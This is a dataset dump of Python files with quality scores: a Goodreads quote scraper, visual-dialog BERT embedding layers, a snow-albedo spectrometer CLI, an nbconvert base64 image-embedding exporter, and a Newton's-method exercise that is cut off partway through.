code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
from bs4 import BeautifulSoup
import requests
import re
from math import ceil
# Module-level accumulator shared by the scraping functions:
# maps quote text -> author name (dict keying also deduplicates quotes).
all_quotes= {}
# NOTE(review): appears unused anywhere in this module — candidate for removal.
global_countr= 1
def clean_quote(quote_uncleaned):
    """Normalize a raw quote scraped from Goodreads.

    Removes newlines, collapses runs of spaces, strips the curly quotation
    marks and a sentence-final period, and trims surrounding whitespace.

    BUG FIX: the original used re.sub('.”', ...) with an unescaped '.',
    which matched ANY character before the closing quote and silently
    deleted it (e.g. the '!' in 'hungry!”').
    """
    text = quote_uncleaned.replace('\n', '')
    text = re.sub(' +', ' ', text)
    # Drop the curly quotation marks themselves.
    text = text.replace('“', '').replace('”', '')
    text = text.strip()
    # Preserve the original behavior of dropping a sentence-final period.
    if text.endswith('.'):
        text = text[:-1]
    return text
def clean_author(author_txt):
    """Return the author name: the text before the first comma, with
    newlines removed and whitespace normalized."""
    name = author_txt.split(',')[0]
    name = re.sub('\n+', '', name)
    name = re.sub(' +', ' ', name)
    return name.strip()
def clean_quote_and_author(quote_txt):
    """Split raw text on the '―' dash and return [quote, author], cleaned.

    Text before '―' is the quote; text after it holds the author name
    (plus book title and other trailing material).
    """
    parts = quote_txt.split('―')
    return [clean_quote(parts[0]), clean_author(parts[1])]
def makeSoup(url):
    """GET *url* and return its HTML content parsed with BeautifulSoup."""
    response = requests.get(url)
    return BeautifulSoup(response.content, 'html.parser')
def _parse_total_count(small_text):
    """Extract the trailing total from Goodreads' summary text.

    E.g. 'Showing 1-30 of 26,975' -> 26975. Returns 0 when no count is found.
    """
    match = re.search(r'of\s+([\d,]+)', small_text)
    if match:
        return int(match.group(1).replace(',', ''))
    return 0

def get_cloud_quotes_quantity(category):
    """Fetch page 1 for *category* and return (total_quote_count, soup).

    Returns (0, soup) when the summary span is missing.

    BUG FIX: the original scanned the summary string backwards and
    concatenated the digits in reverse order, so '26,975' was parsed as
    57962. It also called .text on a possibly-None find() result.
    """
    soup = makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page=1&utf8=%E2%9C%93')
    res = soup.find('span', class_='smallText')
    if res is None:
        return 0, soup
    return _parse_total_count(res.text), soup
def scrap_single_page_data(soup, quantity, total_quotes_to_scrap):
    """Parse up to *quantity* quotes from one results page into the
    module-level `all_quotes` dict and print overall progress.

    *total_quotes_to_scrap* is the overall target used only for the
    progress percentage.
    """
    taken = 1
    for quote_div in soup.findAll('div', class_='quoteText'):
        cleaned = clean_quote_and_author(quote_div.text)
        all_quotes[cleaned[0]] = cleaned[1]  # quote text -> author
        if taken == quantity:
            break
        taken += 1
    # Progress is measured against the overall target, not this page.
    progress = round((len(all_quotes) / total_quotes_to_scrap) * 100, 2)
    print(f"Processing....{progress}%")
def scrap_multi_page_data(no_of_pages, category, quantity):
    """Scrape *quantity* quotes for *category* across *no_of_pages* pages.

    Re-runs the full page sweep while the (deduplicating) `all_quotes`
    dict is still short of *quantity*.
    """
    global all_quotes
    while len(all_quotes) < quantity:
        for page_no in range(1, no_of_pages+1):
            soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page={page_no}&utf8=%E2%9C%93')
            if page_no != no_of_pages:
                scrap_single_page_data(soup, 30, quantity)
            else:
                # BUG FIX: the original used `quantity % 30`, which is 0
                # when quantity is an exact multiple of 30; compute the
                # true remainder for the final page instead.
                last_page_quantity = quantity - 30 * (no_of_pages - 1)
                scrap_single_page_data(soup, last_page_quantity, quantity)
def get_quotes(category, quantity):
    """Validate the request, then dispatch to single- or multi-page scraping."""
    if quantity < 1:
        print('please enter a greater number than 0')
        return
    cloud_quotes_quantity, soup = get_cloud_quotes_quantity(category)
    if cloud_quotes_quantity <= 0:
        print(f"Sorry! we can't find any data for that Query. \nPlease Enter proper category like 'life', 'water',etc.,")
        return
    if cloud_quotes_quantity < quantity:
        print(f"Sorry, we can't find that much quantity of results\nwe only have {cloud_quotes_quantity} results.")
        return
    # One results page holds at most 30 quotes.
    if quantity <= 30:
        scrap_single_page_data(soup, quantity, quantity)
    else:
        scrap_multi_page_data(ceil(quantity / 30), category, quantity)
def scrap_quotes(category,quantity):
get_quotes(category,quantity)
if get_quotes:
return all_quotes
else:
print('No Quote Found') | scrapper/web_scrapper.py | from bs4 import BeautifulSoup
import requests
import re
from math import ceil
all_quotes= {}
global_countr= 1
def clean_quote(quote_uncleaned):
# remove unwanted characters
cleaned_quote1= re.sub('\n','',quote_uncleaned)
cleaned_quote2= re.sub(' +',' ',cleaned_quote1)
cleaned_quote3= re.sub(' “','',cleaned_quote2)
cleaned_quote4= re.sub('.”','',cleaned_quote3)
cleaned_quote5= cleaned_quote4.strip() # remove trailing whitespaces
return cleaned_quote5
def clean_author(author_txt):
# get author name.. present before comma by splitting
author= author_txt.split(',')
final_txt1= re.sub('\n+','',author[0])
cleaned_author= re.sub(' +',' ',final_txt1) # remove unwanted & trailing whitespaces
cleaned_author1= cleaned_author.strip()
return cleaned_author1
def clean_quote_and_author(quote_txt):
quote_with_author= []
# txt before "―" is our quote & txt after "―" is our author & other stuff
quote_author_unclean= quote_txt.split('―')
cleaned_quote= clean_quote(quote_author_unclean[0]) # format quote
cleaned_author= clean_author(quote_author_unclean[1]) # format author name
# append author & quote to list
quote_with_author.append(cleaned_quote)
quote_with_author.append(cleaned_author)
return quote_with_author
def makeSoup(url):
resp_by_category= requests.get(url)
htmlContent= resp_by_category.content
soup= BeautifulSoup(htmlContent,'html.parser')
return soup
def get_cloud_quotes_quantity(category):
soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page=1&utf8=%E2%9C%93')
res= soup.find('span' ,class_='smallText')
results= res.text
if results:
tmp_str_val= ''
final_extracted_val= int()
for indx in range(len(results)-1,8,-1):
if results[indx]== ' ':
break
if results[indx]== ',':
continue
tmp_str_val+= results[indx]
final_extracted_val= int(tmp_str_val)
return final_extracted_val,soup
else:
return 0,soup
def scrap_single_page_data(soup,quantity,total_quotes_to_scrap):
countr= 1
all_quotes_div= soup.findAll('div',class_='quoteText')
for quote_div in all_quotes_div:
quote_txt= quote_div.text
quot_and_author= clean_quote_and_author(quote_txt)
quote= quot_and_author[0]
author= quot_and_author[1]
all_quotes[quote]= author
if countr == quantity:
break
countr += 1
process_unformatted= (len(all_quotes)/total_quotes_to_scrap)*100
process_round_off= round(process_unformatted,2)
print(f"Processing....{process_round_off}%")
def scrap_multi_page_data(no_of_pages, category, quantity):
global all_quotes
while len(all_quotes) < quantity:
for page_no in range(1, no_of_pages+1):
soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page={page_no}&utf8=%E2%9C%93')
if page_no != no_of_pages:
scrap_single_page_data(soup,30,quantity)
else:
last_page_quantity= quantity % 30
scrap_single_page_data(soup,last_page_quantity,quantity)
def get_quotes(category,quantity):
if quantity< 1:
print('please enter a greater number than 0')
return
cloud_quotes_quantity,soup= get_cloud_quotes_quantity(category)
if cloud_quotes_quantity <=0:
print(f"Sorry! we can't find any data for that Query. \nPlease Enter proper category like 'life', 'water',etc.,")
elif cloud_quotes_quantity< quantity:
print(f"Sorry, we can't find that much quantity of results\nwe only have {cloud_quotes_quantity} results.")
else:
if quantity <= 30:
scrap_single_page_data(soup,quantity,quantity)
elif quantity > 30:
res= quantity
no_of_pages= ceil(res / 30)
scrap_multi_page_data(no_of_pages, category, quantity)
def scrap_quotes(category,quantity):
get_quotes(category,quantity)
if get_quotes:
return all_quotes
else:
print('No Quote Found') | 0.136637 | 0.095687 |
from ..builder import EMBEDDING
from torch import nn
import torch
import math
class BertLayerNorm(nn.Module):
    """Layer normalization in the TensorFlow style, i.e. the epsilon is
    added inside the square root."""

    def __init__(self, hidden_size, eps=1e-12):
        super(BertLayerNorm, self).__init__()
        self.weight = nn.Parameter(torch.ones(hidden_size))  # gain (gamma)
        self.bias = nn.Parameter(torch.zeros(hidden_size))   # offset (beta)
        self.variance_epsilon = eps

    def forward(self, x):
        # Normalize over the last (hidden) dimension only.
        mean = x.mean(-1, keepdim=True)
        variance = (x - mean).pow(2).mean(-1, keepdim=True)
        normalized = (x - mean) / torch.sqrt(variance + self.variance_epsilon)
        return normalized * self.weight + self.bias
@EMBEDDING.register_module()
class VisDiaBertEmbeddingsDialog(nn.Module):
    """Token embeddings for visual-dialog BERT: word + learned position +
    (extended) token-type embeddings, followed by LayerNorm and dropout."""

    def __init__(self, config):
        super(VisDiaBertEmbeddingsDialog, self).__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        # Fixed sinusoidal position table. NOTE(review): `self.pe` is not
        # used in forward() below — confirm whether a consumer reads it.
        # NOTE(review): assumes config.hidden_size is even; the `i + 1`
        # write would raise IndexError for odd sizes — TODO confirm.
        max_seq_len = 256
        d_model = config.hidden_size
        pe = torch.zeros(max_seq_len, d_model)
        for pos in range(max_seq_len):
            for i in range(0, d_model, 2):
                pe[pos, i] = \
                    math.sin(pos / (10000 ** ((2 * i) / d_model)))
                pe[pos, i + 1] = \
                    math.cos(pos / (10000 ** ((2 * (i + 1)) / d_model)))
        # BUG FIX: was `self.pe = pe.cuda()`, which crashes on CPU-only
        # hosts and does not follow the module across .to()/.cuda() calls.
        # A non-persistent buffer moves with the module and keeps the
        # state_dict unchanged (the original attribute was not saved either).
        self.register_buffer('pe', pe, persistent=False)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        # Support for additional segment embeddings (10 extra ids as of now).
        self.token_type_embeddings_extension = nn.Embedding(10, config.hidden_size)
        # Specialized embeddings for [SEP] tokens.
        self.sep_embeddings = nn.Embedding(50, config.hidden_size)
        # self.LayerNorm is not snake-cased to stick with TensorFlow model
        # variable names and be able to load any TensorFlow checkpoint file.
        self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.config = config

    def forward(self, input_ids, sep_indices=None, sep_len=None, token_type_ids=None):
        """Embed *input_ids*.

        Token-type ids >= config.type_vocab_size are routed to the
        extension table (shifted down by type_vocab_size); the two
        lookups are merged with complementary masks.
        """
        seq_length = input_ids.size(1)
        position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
        position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
        if token_type_ids is None:
            token_type_ids = torch.zeros_like(input_ids)
        words_embeddings = self.word_embeddings(input_ids)
        position_embeddings = self.position_embeddings(position_ids)
        # Split ids into the base table range and the extension range.
        token_type_ids_extension = token_type_ids - self.config.type_vocab_size
        token_type_ids_extension_mask = (token_type_ids_extension >= 0).float()
        token_type_ids_extension = (token_type_ids_extension.float() * token_type_ids_extension_mask).long()
        token_type_ids_mask = (token_type_ids < self.config.type_vocab_size).float()
        # The two masks must partition every position exactly once.
        assert torch.sum(token_type_ids_extension_mask + token_type_ids_mask) == \
            torch.numel(token_type_ids) == torch.numel(token_type_ids_mask)
        token_type_ids = (token_type_ids.float() * token_type_ids_mask).long()
        token_type_embeddings = self.token_type_embeddings(token_type_ids)
        token_type_embeddings_extension = self.token_type_embeddings_extension(token_type_ids_extension)
        # Merge: base embeddings where mask==1, extension embeddings elsewhere.
        token_type_embeddings = (token_type_embeddings * token_type_ids_mask.unsqueeze(-1)) + \
            (token_type_embeddings_extension * token_type_ids_extension_mask.unsqueeze(-1))
        embeddings = words_embeddings + position_embeddings + token_type_embeddings
        embeddings = self.LayerNorm(embeddings)
        embeddings = self.dropout(embeddings)
        return embeddings
@EMBEDDING.register_module()
class VisDiaBertImageEmbeddings(nn.Module):
    """Construct the embeddings from image, spatial location (omit now) and
    token_type embeddings."""
    def __init__(self, config):
        super(VisDiaBertImageEmbeddings, self).__init__()
        # Project region features (v_feature_size) into the visual hidden space.
        self.image_embeddings = nn.Linear(config.v_feature_size, config.v_hidden_size)
        # 5-dim spatial input — presumably normalized box coordinates plus
        # area; TODO confirm against the data pipeline.
        self.image_location_embeddings = nn.Linear(5, config.v_hidden_size)
        self.LayerNorm = BertLayerNorm(config.v_hidden_size, eps=1e-12)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
    def forward(self, input_ids, input_loc):
        # Despite the name, `input_ids` here are image region FEATURE vectors
        # fed through a Linear layer, not integer token ids.
        img_embeddings = self.image_embeddings(input_ids)
        loc_embeddings = self.image_location_embeddings(input_loc)
        # Sum feature + location embeddings, then normalize and regularize.
        embeddings = self.LayerNorm(img_embeddings + loc_embeddings)
        embeddings = self.dropout(embeddings)
        return embeddings | imix/models/embedding/visual_dialog_embedding.py | from ..builder import EMBEDDING
from torch import nn
import torch
import math
class BertLayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
"""Construct a layernorm module in the TF style (epsilon inside the
square root)."""
super(BertLayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
@EMBEDDING.register_module()
class VisDiaBertEmbeddingsDialog(nn.Module):
def __init__(self, config):
super(VisDiaBertEmbeddingsDialog, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
max_seq_len = 256
d_model = config.hidden_size
pe = torch.zeros(max_seq_len, d_model)
for pos in range(max_seq_len):
for i in range(0, d_model, 2):
pe[pos, i] = \
math.sin(pos / (10000 ** ((2 * i) / d_model)))
pe[pos, i + 1] = \
math.cos(pos / (10000 ** ((2 * (i + 1)) / d_model)))
self.pe = pe.cuda()
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# add support for additional segment embeddings. Supporting 10 additional embedding as of now
self.token_type_embeddings_extension = nn.Embedding(10, config.hidden_size)
# adding specialized embeddings for sep tokens
self.sep_embeddings = nn.Embedding(50, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.config = config
def forward(self, input_ids, sep_indices=None, sep_len=None, token_type_ids=None):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_ids_extension = token_type_ids - self.config.type_vocab_size
token_type_ids_extension_mask = (token_type_ids_extension >= 0).float()
token_type_ids_extension = (token_type_ids_extension.float() * token_type_ids_extension_mask).long()
token_type_ids_mask = (token_type_ids < self.config.type_vocab_size).float()
assert torch.sum(token_type_ids_extension_mask + token_type_ids_mask) == \
torch.numel(token_type_ids) == torch.numel(token_type_ids_mask)
token_type_ids = (token_type_ids.float() * token_type_ids_mask).long()
token_type_embeddings = self.token_type_embeddings(token_type_ids)
token_type_embeddings_extension = self.token_type_embeddings_extension(token_type_ids_extension)
token_type_embeddings = (token_type_embeddings * token_type_ids_mask.unsqueeze(-1)) + \
(token_type_embeddings_extension * token_type_ids_extension_mask.unsqueeze(-1))
embeddings = words_embeddings + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
@EMBEDDING.register_module()
class VisDiaBertImageEmbeddings(nn.Module):
"""Construct the embeddings from image, spatial location (omit now) and
token_type embeddings."""
def __init__(self, config):
super(VisDiaBertImageEmbeddings, self).__init__()
self.image_embeddings = nn.Linear(config.v_feature_size, config.v_hidden_size)
self.image_location_embeddings = nn.Linear(5, config.v_hidden_size)
self.LayerNorm = BertLayerNorm(config.v_hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, input_ids, input_loc):
img_embeddings = self.image_embeddings(input_ids)
loc_embeddings = self.image_location_embeddings(input_loc)
embeddings = self.LayerNorm(img_embeddings + loc_embeddings)
embeddings = self.dropout(embeddings)
return embeddings | 0.962365 | 0.420302 |
import click
from .measurement_composite import MeasurementComposite
from .plotter import Plotter
@click.command(
help='Calculate snow albedo from a sequence of up and down looking '
'measurements with the ASD field spectrometer.'
)
@click.option(
'-in', '--input-dir',
prompt=True, type=click.Path(exists=True),
help='Path to input directory containing both up and down looking '
'measurements',
)
@click.option(
'-fp', '--file-prefix',
prompt=True,
help='Prefix of the filename for an individual measurement.'
)
@click.option(
'-ofs', '--output-file-suffix',
default='albedo',
help='Suffix to use for the saved file. Default: albedo'
)
@click.option(
'--up-looking-file-start', '-up', 'up_index',
prompt=True, type=int,
help='Start index of the file containing the first up looking measurement.'
)
@click.option(
'--up-looking-count', '-ulc', 'up_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--down-looking-file-start', '-down', 'down_index',
prompt=True, type=int,
help='Start index of the file containing the first down looking '
'measurement.',
)
@click.option(
'--down-looking-count', '-dlc', 'down_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--skip-plot',
is_flag=True, default=False,
help="Don't show plot of the result",
)
@click.option(
'--debug',
is_flag=True, default=False,
help='Print information of processed files while processing',
)
def cli(
input_dir,
file_prefix, output_file_suffix,
up_index, up_count,
down_index, down_count,
skip_plot, debug
):
try:
composite = MeasurementComposite(
input_dir, file_prefix, down_index, up_index,
set_1_count=down_count, set_2_count=up_count,
debug=debug
)
composite.calculate()
print(f"Results saved to:\n {composite.save(output_file_suffix)}")
if composite.set_2.mean() < composite.set_1.mean():
set_1_label = 'Incoming'
set_2_label = 'Outgoing'
else:
set_1_label = 'Outgoing'
set_2_label = 'Incoming'
if not skip_plot:
Plotter.show_composite(
composite,
composite_title='Albedo',
set_1_label=set_1_label,
set_2_label=set_2_label
)
except FileNotFoundError as fnfe:
print(f"ERROR: {fnfe}") | src/spectro_dp/asd/albedo.py | import click
from .measurement_composite import MeasurementComposite
from .plotter import Plotter
@click.command(
help='Calculate snow albedo from a sequence of up and down looking '
'measurements with the ASD field spectrometer.'
)
@click.option(
'-in', '--input-dir',
prompt=True, type=click.Path(exists=True),
help='Path to input directory containing both up and down looking '
'measurements',
)
@click.option(
'-fp', '--file-prefix',
prompt=True,
help='Prefix of the filename for an individual measurement.'
)
@click.option(
'-ofs', '--output-file-suffix',
default='albedo',
help='Suffix to use for the saved file. Default: albedo'
)
@click.option(
'--up-looking-file-start', '-up', 'up_index',
prompt=True, type=int,
help='Start index of the file containing the first up looking measurement.'
)
@click.option(
'--up-looking-count', '-ulc', 'up_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--down-looking-file-start', '-down', 'down_index',
prompt=True, type=int,
help='Start index of the file containing the first down looking '
'measurement.',
)
@click.option(
'--down-looking-count', '-dlc', 'down_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--skip-plot',
is_flag=True, default=False,
help="Don't show plot of the result",
)
@click.option(
'--debug',
is_flag=True, default=False,
help='Print information of processed files while processing',
)
def cli(
input_dir,
file_prefix, output_file_suffix,
up_index, up_count,
down_index, down_count,
skip_plot, debug
):
try:
composite = MeasurementComposite(
input_dir, file_prefix, down_index, up_index,
set_1_count=down_count, set_2_count=up_count,
debug=debug
)
composite.calculate()
print(f"Results saved to:\n {composite.save(output_file_suffix)}")
if composite.set_2.mean() < composite.set_1.mean():
set_1_label = 'Incoming'
set_2_label = 'Outgoing'
else:
set_1_label = 'Outgoing'
set_2_label = 'Incoming'
if not skip_plot:
Plotter.show_composite(
composite,
composite_title='Albedo',
set_1_label=set_1_label,
set_2_label=set_2_label
)
except FileNotFoundError as fnfe:
print(f"ERROR: {fnfe}") | 0.370225 | 0.196614 |
import base64
import re
from nbconvert.exporters.html import HTMLExporter
from ipython_genutils.ipstruct import Struct
import os
try:
from urllib.request import urlopen # py3
except ImportError:
from urllib2 import urlopen
class EmbedHTMLExporter(HTMLExporter):
"""
:mod:`nbconvert` Exporter which embeds graphics as base64 into html.
Convert to HTML and embed graphics (pdf, svg and raster images) in the HTML
file.
Example usage::
jupyter nbconvert --to html_embed mynotebook.ipynb
"""
def replfunc(self, match):
"""Replace source url or file link with base64 encoded blob."""
url = match.group(1)
imgformat = url.split('.')[-1]
if url.startswith('http'):
data = urlopen(url).read()
elif url.startswith('data'):
img = '<img src="' + url + '"'
return img
elif url.startswith('attachment'):
imgname = url.split(':')[1]
available_formats = self.attachments[imgname]
# get the image based on the configured image type priority
for imgformat in self.config.NbConvertBase.display_data_priority:
if imgformat in available_formats.keys():
b64_data = self.attachments[imgname][imgformat]
img = '<img src="data:' + imgformat + \
';base64,' + b64_data + '"'
return img
raise ValueError('Could not find attachment for image "%s" in notebook' % imgname)
else:
filename = os.path.join(self.path, url)
with open(filename, 'rb') as f:
data = f.read()
self.log.info("embedding url: %s, format: %s" % (url, imgformat))
b64_data = base64.b64encode(data).decode("utf-8")
if imgformat == "svg":
img = '<img src="data:image/svg+xml;base64,' + \
b64_data + '"'
elif imgformat == "pdf":
img = '<img src="data:application/pdf;base64,' + \
b64_data + '"'
else:
img = '<img src="data:image/' + imgformat + \
';base64,' + b64_data + '"'
return img
def from_notebook_node(self, nb, resources=None, **kw):
output, resources = super(
EmbedHTMLExporter, self).from_notebook_node(nb, resources)
self.path = resources['metadata']['path']
self.attachments = Struct()
for cell in nb.cells:
if 'attachments' in cell.keys():
self.attachments += cell['attachments']
regex = re.compile('<img\s+src="([^"]+)"')
embedded_output = regex.sub(self.replfunc, output)
return embedded_output, resources | jupyter_contrib_nbextensions/nbconvert_support/embedhtml.py |
import base64
import re
from nbconvert.exporters.html import HTMLExporter
from ipython_genutils.ipstruct import Struct
import os
try:
from urllib.request import urlopen # py3
except ImportError:
from urllib2 import urlopen
class EmbedHTMLExporter(HTMLExporter):
"""
:mod:`nbconvert` Exporter which embeds graphics as base64 into html.
Convert to HTML and embed graphics (pdf, svg and raster images) in the HTML
file.
Example usage::
jupyter nbconvert --to html_embed mynotebook.ipynb
"""
def replfunc(self, match):
"""Replace source url or file link with base64 encoded blob."""
url = match.group(1)
imgformat = url.split('.')[-1]
if url.startswith('http'):
data = urlopen(url).read()
elif url.startswith('data'):
img = '<img src="' + url + '"'
return img
elif url.startswith('attachment'):
imgname = url.split(':')[1]
available_formats = self.attachments[imgname]
# get the image based on the configured image type priority
for imgformat in self.config.NbConvertBase.display_data_priority:
if imgformat in available_formats.keys():
b64_data = self.attachments[imgname][imgformat]
img = '<img src="data:' + imgformat + \
';base64,' + b64_data + '"'
return img
raise ValueError('Could not find attachment for image "%s" in notebook' % imgname)
else:
filename = os.path.join(self.path, url)
with open(filename, 'rb') as f:
data = f.read()
self.log.info("embedding url: %s, format: %s" % (url, imgformat))
b64_data = base64.b64encode(data).decode("utf-8")
if imgformat == "svg":
img = '<img src="data:image/svg+xml;base64,' + \
b64_data + '"'
elif imgformat == "pdf":
img = '<img src="data:application/pdf;base64,' + \
b64_data + '"'
else:
img = '<img src="data:image/' + imgformat + \
';base64,' + b64_data + '"'
return img
def from_notebook_node(self, nb, resources=None, **kw):
output, resources = super(
EmbedHTMLExporter, self).from_notebook_node(nb, resources)
self.path = resources['metadata']['path']
self.attachments = Struct()
for cell in nb.cells:
if 'attachments' in cell.keys():
self.attachments += cell['attachments']
regex = re.compile('<img\s+src="([^"]+)"')
embedded_output = regex.sub(self.replfunc, output)
return embedded_output, resources | 0.591133 | 0.200577 |
# Práctica 1, <NAME>
# <NAME>
# Método de Newton para minimizar funciones
import numpy as np
import sympy as sp
import matplotlib.pyplot as plt
x, y = sp.symbols('x y')

# Function to minimize
f_sym = sp.Lambda((x, y), sp.simplify((x-2)**2 + 2*(y+2)**2 + 2*sp.sin(2*sp.pi*x)*sp.sin(2*sp.pi*y)))

def _as_numeric(sym_func):
    """Wrap a sympy Lambda into a numeric function w=(x, y) -> float.

    Replaces the six copy-pasted wrapper functions that previously
    repeated `float(sym(w[0], w[1]))` for f, fx, fy, fxx, fxy and fyy.
    """
    def numeric(w):
        return float(sym_func(w[0], w[1]))
    return numeric

f = _as_numeric(f_sym)

# First-order partial derivatives of f
fx_sym = sp.Lambda((x, y), sp.simplify(sp.diff(f_sym(x, y), x)))
fx = _as_numeric(fx_sym)
fy_sym = sp.Lambda((x, y), sp.simplify(sp.diff(f_sym(x, y), y)))
fy = _as_numeric(fy_sym)

def gradf(w):
    """Gradient of f at w as a float64 array."""
    return np.array((fx(w), fy(w)), np.float64)

# Second-order partial derivatives of f
fxx_sym = sp.Lambda((x, y), sp.simplify(sp.diff(fx_sym(x, y), x)))
fxx = _as_numeric(fxx_sym)
fxy_sym = sp.Lambda((x, y), sp.simplify(sp.diff(fx_sym(x, y), y)))
fxy = _as_numeric(fxy_sym)
fyy_sym = sp.Lambda((x, y), sp.simplify(sp.diff(fy_sym(x, y), y)))
fyy = _as_numeric(fyy_sym)

# Hessian matrix
def hessf(w):
    """Hessian of f at w; f is C^2, so fxy == fyx and the matrix is symmetric."""
    a = fxy(w)
    return np.array([[fxx(w), a], [a, fyy(w)]])
# Método de Newton para encontrar un 0 en la derivada
def newton(w, grad_fun, hess_fun, fun, max_iters=500):
    """Newton's method for a zero of the gradient (a critical point of *fun*).

    Parameters: starting point *w*, callables for gradient/Hessian/value,
    and the iteration count. Returns the final iterate and the list of
    *fun* values per iteration (max_iters + 1 entries, starting point
    included).
    """
    history = [fun(w)]
    for _ in range(max_iters):
        # IMPROVED: solve H * step = grad instead of explicitly inverting
        # the Hessian — cheaper and numerically more stable than
        # np.linalg.inv followed by a matrix product.
        step = np.linalg.solve(hess_fun(w), grad_fun(w))
        w = w - step
        history.append(fun(w))
    return w, history
# Gradiente descendiente (para compararlo)
def gd(w, lr, grad_fun, fun, max_iters=1000):
    """Plain gradient descent with fixed learning rate *lr*.

    Returns the final iterate and a float64 array of *fun* values per
    iteration (max_iters + 1 entries, starting point included).
    """
    history = [fun(w)]
    for _ in range(max_iters):
        w = w - lr * grad_fun(w)
        history.append(fun(w))
    return w, np.array(history, np.float64)
# Top-level experiment: run Newton and gradient descent from several starting
# points, print the solutions, and plot the per-iteration objective values.
print('Comparación del método de Newton con el gradiente descendente:\n')
# Number of iterations for both optimizers
max_iters=20
# Learning rate for gradient descent
lr=0.01
# Starting points
condiciones_iniciales=np.array([(2.1, -2.1),(3.0, -3.0),(1.5, 1.5),(1.0, -1.0)])
# Experiments with results (no pauses added, because each iteration already
# blocks until the generated plot window is closed; the pause below can be
# uncommented if desired)
for w in condiciones_iniciales:
    wn, grafn = newton(w, gradf, hessf, f, max_iters)
    wg, grafg = gd(w, lr, gradf, f, max_iters)
    # Report the results of both methods
    print('Punto de inicio:', w)
    print('Solución y valor del método de Newton:')
    print ('(x,y) = (', wn[0], ', ', wn[1],')')
    print ('f(x,y) = ',f(wn))
    print('Solución y valor del gradiente estocástico:')
    print ('(x,y) = (', wg[0], ', ', wg[1],')')
    print ('f(x,y) = ',f(wg))
    print()
    #input("\n--- Pulsar tecla para continuar ---\n")
    # Decrease curve of the objective for both methods
    plt.plot(range(0,max_iters+1), grafn, 'bo', alpha=0.6, label='Newton')
    plt.plot(range(0,max_iters+1), grafg, 'ro', alpha=0.4, label='Grad. Desc.')
    plt.xlabel('Iteraciones')
    plt.ylabel('f(x,y)')
    plt.title('Punto de inicio: w = '+str(w))
    plt.legend()
    plt.show()
input("\n--- Pulsar tecla para salir ---\n") | practica1/bonus.py |
# Práctica 1, <NAME>
# <NAME>
# Método de Newton para minimizar funciones
import numpy as np
import sympy as sp
import matplotlib.pyplot as plt
x, y = sp.symbols('x y')
# Función a minimizar
f_sym=sp.Lambda((x,y), sp.simplify((x-2)**2+2*(y+2)**2+2*sp.sin(2*sp.pi*x)*sp.sin(2*sp.pi*y)))
def f(w):
return float(f_sym(w[0],w[1]))
# Derivada parcial de f respecto de x
fx_sym=sp.Lambda((x,y), sp.simplify(sp.diff(f_sym(x,y),x)))
def fx(w):
return float(fx_sym(w[0],w[1]))
# Derivada parcial de f respecto de y
fy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(f_sym(x,y),y)))
def fy(w):
return float(fy_sym(w[0],w[1]))
# Gradiente de f
def gradf(w):
return np.array((fx(w), fy(w)),np.float64)
# Derivadas parciales de segundo orden:
fxx_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fx_sym(x,y),x)))
def fxx(w):
return float(fxx_sym(w[0],w[1]))
fxy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fx_sym(x,y),y)))
def fxy(w):
return float(fxy_sym(w[0],w[1]))
fyy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fy_sym(x,y),y)))
def fyy(w):
return float(fyy_sym(w[0],w[1]))
# <NAME>
def hessf(w):
a=fxy(w) # f es de clase 2, así que fxy = fyx
return np.array([[fxx(w),a],[a,fyy(w)]])
# Método de Newton para encontrar un 0 en la derivada
def newton(w, grad_fun, hess_fun, fun, max_iters=500):
graf = []
graf.append(fun(w))
for _ in range(max_iters):
H1=np.linalg.inv(hess_fun(w))
w = w - np.dot(H1,grad_fun(w))
graf.append(fun(w))
return w, graf
# Gradiente descendiente (para compararlo)
def gd(w, lr, grad_fun, fun, max_iters = 1000):
graf = []
graf.append(fun(w))
for _ in range(max_iters):
grad=grad_fun(w)
